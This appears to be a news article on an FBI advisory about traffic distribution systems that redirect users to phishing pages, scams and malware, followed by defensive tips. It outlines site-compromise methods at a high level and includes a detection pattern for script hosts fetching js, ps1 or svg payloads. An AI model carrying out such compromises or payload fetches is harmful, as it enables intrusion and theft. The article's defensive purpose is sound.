FBI Warns of Cyber Threat Using Fake Websites to Steal Data
FBI Warns of Cyber Threat Using Fake Websites to Steal Data

The FBI has issued a warning to Americans about a rising cyber threat that employs fraudulent websites and fake login pages to steal money, passwords, and personal information. In a new public advisory, the agency highlighted that cyber criminals are utilizing malicious traffic distribution systems (TDSs) to secretly redirect internet users to scam websites, phishing pages, and malware downloads. These systems can also help attackers bypass traditional firewall protections and gain access to victim networks. Criminals often lure users through fake advertisements, phishing emails, and compromised websites that initially appear legitimate.

How a Malicious Traffic Distribution System Works

Initiation of Redirection

Cyber criminals use various methods to drive users to a TDS, including social engineering techniques such as links in phishing emails, search engine optimization poisoning that promotes fraudulent advertisement links mimicking legitimate ones, or compromising legitimate websites by altering website code. Legitimate websites are vulnerable to compromise when using insecure passwords or outdated themes and plugins. Attackers gain unauthorized access by brute-forcing weak administrative passwords or exploiting vulnerabilities in outdated plugins. After gaining administrative access, they edit the website’s code to redirect visitors to a malicious TDS.

Redirection Bypasses Firewalls

Cyber criminals often use TDS to bypass traditional firewall rules that would otherwise block connections to malicious sites. The TDS employs a complex chain of intermediate nodes to hide the final malicious destination, making it difficult to trace and block.

Wide Pickt banner — collaborative shopping lists app for Telegram, phone mockup with grocery list

Filtering Website Visitors

Cyber criminals use TDS to analyze potential victims by collecting their IP address, operating system, location, device, and browser information. Based on this data, the TDS can determine if a payload is effective and filter traffic accordingly. Attackers can identify users in regions they are not targeting, allowing them to avoid detection by displaying safe content to undesired targets, including security researchers.

Exploitation of Users

Cyber criminals exploit website visitor devices at the end of the TDS redirection chain by delivering phishing pages, financial scams, and other malware. Sometimes, they use a TDS to gain access to a victim’s network, often through malware distribution. Access to victim accounts obtained via network access may be sold to other criminals, including ransomware groups.

Tips to Protect Yourself

The FBI recommends individuals take the following precautions to avoid being targeted by a malicious TDS:

  • Exercise caution when clicking on advertisements: Before clicking, check the URL to ensure the site is authentic. A malicious URL may resemble a legitimate one or be a subdomain of a legitimate domain.
  • Keep Software Updated: Regularly update website software, plugins, and themes to patch known vulnerabilities. Enable automatic updates for minor releases and plugins.
  • Use Security Plugins & Firewalls: Install reputable plugins that provide a Web Application Firewall (WAF) to block malicious traffic.
  • Harden Login Security: Enforce strong passwords for all users, implement Two-Factor Authentication (2FA), and limit login attempts to prevent brute-force attacks.
  • Avoid Unverified Developers: Only install third-party plugins and themes from reputable, verified developers and official repositories.

The FBI also recommends businesses take the following precautions:

Pickt after-article banner — collaborative shopping lists app with family illustration
  • Change Default File Associations: Consider changing default file associations for js files to prevent users from executing malicious js payloads delivered via TDS.
  • Monitor Endpoints: Monitor endpoints for suspicious execution of wscript.exe, cscript.exe, and PowerShell scripts invoking web requests for suspicious files, especially js, ps1, or svg files.
  • User Training and Awareness: Combat phishing and social engineering through user training and awareness.
  • Audit and Patch Web Hosting Administration: Frequently audit CMS admin, database, FTP, and web hosting accounts, using strong, unique passwords. Patch all CMS and third-party components.